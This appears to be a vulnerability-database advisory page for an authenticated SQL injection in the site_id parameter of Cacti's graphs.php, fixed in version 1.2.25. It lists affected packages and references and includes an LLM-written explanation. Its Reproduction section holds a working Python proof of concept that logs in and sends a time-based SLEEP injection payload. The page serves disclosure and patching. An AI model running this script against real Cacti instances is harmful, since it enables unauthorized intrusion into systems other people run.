Authenticated SQL injection vulnerability in graphs.php in Cacti
Description
Cacti is an open source operational monitoring and fault management framework. An authenticated SQL injection vulnerability was discovered which allows authenticated users to perform privilege escalation and remote code execution. The vulnerability resides in the graphs.php file. When dealing with the cases of ajax_hosts and ajax_hosts_noany, if the site_id parameter is greater than 0, it is directly reflected in the WHERE clause of the SQL statement. This creates an SQL injection vulnerability. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
13<1.2.25+ 1 more
- (no CPE)range: <1.2.25
- (no CPE)range: < 1.2.25
- osv-coords11 versionspkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.5pkg:rpm/opensuse/cacti&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.5pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP5pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP5
< 1.2.25-bp155.2.3.1+ 10 more
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-2.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
Patches
Vulnerability mechanics
Root cause
"The application directly embeds user-controlled input into SQL queries without proper sanitization."
Attack vector
An authenticated user can exploit this vulnerability by sending a crafted request to the `graphs.php` file. Specifically, when the `action` parameter is set to `ajax_hosts` or `ajax_hosts_noany`, and the `site_id` parameter is greater than 0, the value is directly incorporated into an SQL query's WHERE clause. This allows an attacker to inject malicious SQL code, such as a time-based SQL injection payload, to confirm the vulnerability [ref_id=1].
Affected code
The vulnerability resides in the `graphs.php` file. The affected code segments are within the `case 'ajax_hosts':` and `case 'ajax_hosts_noany':` blocks, where the `site_id` parameter is checked and then directly used to construct the `$sql_where` variable, which is subsequently included in an SQL statement [ref_id=1].
What the fix does
The advisory indicates that the vulnerability is addressed in version 1.2.25. While a specific patch diff is not provided, the fix likely involves sanitizing or parameterizing the `site_id` input before it is used in the SQL query, preventing the injection of arbitrary SQL code.
Preconditions
- authThe attacker must have authenticated user credentials for the Cacti application.
- inputThe `site_id` parameter must be greater than 0.
Reproduction
By running the following Python3 code, you will observe a delay of 10 seconds in the response, which indicates the occurrence of SQL injection. ```python import argparse import requests import sys import urllib3
#import os #os.environ['http_proxy'] = 'http://localhost:8080'
sleep_time = 10 payload = f"""1 AND (SELECT 1 FROM (SELECT(SLEEP({sleep_time})))A)"""
def get_csrf_token(): url = f"{target}/index.php" res_body = session.get(url).content.decode() csrf_token = res_body.split('var csrfMagicToken = "')[1].split('"')[0] if not csrf_token: print("[-] Unable to find csrf_token") sys.exit() return csrf_token
def login(username,password): login_url = f"{target}/index.php"
csrf_token = get_csrf_token() data = {'action':'login','login_username':username,'login_password':password,'__csrf_magic':csrf_token} res_body = session.post(login_url,data=data).content.decode() if 'You are now logged into <' in res_body: print('[+] Login successful!') else: print('[-] Login failed. Check your credentials') sys.exit()
def exploit(): url = f"{target}/graphs.php"
params = { 'action':'ajax_hosts', 'site_id':payload }
print('[+] Sending payload...') print(f"[+] Payload: {payload}") session.get(url,params=params) if __name__=='__main__': urllib3.disable_warnings() parser = argparse.ArgumentParser(description="Cacti 1.2.24 - graphs.php 'site_id' SQL Injection (authenticated)") parser.add_argument('-t','--target',help='',required=True) parser.add_argument('-u','--username',help='',required=True) parser.add_argument('-p','--password',help='',required=True) args = parser.parse_args() username = args.username password = args.password target = args.target session = requests.Session()
login(username,password) exploit() ``` [ref_id=1]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/Cacti/cacti/security/advisories/GHSA-q4wh-3f9w-836hmitrex_refsource_CONFIRM
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/mitre
- www.debian.org/security/2023/dsa-5550mitre
News mentions
0No linked articles in our index yet.